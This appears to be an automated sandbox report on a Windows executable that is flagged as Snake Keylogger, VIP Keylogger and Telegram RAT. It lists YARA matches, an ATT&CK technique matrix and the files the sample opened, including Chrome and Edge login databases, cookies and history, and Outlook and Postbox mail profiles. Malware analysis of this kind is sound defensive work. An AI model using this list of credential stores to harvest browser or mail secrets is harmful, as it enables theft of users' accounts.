Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Users\user\Desktop\OtldpQxzAw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3301331554.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 5172, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OtldpQxzAw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
OtldpQxzAw.exe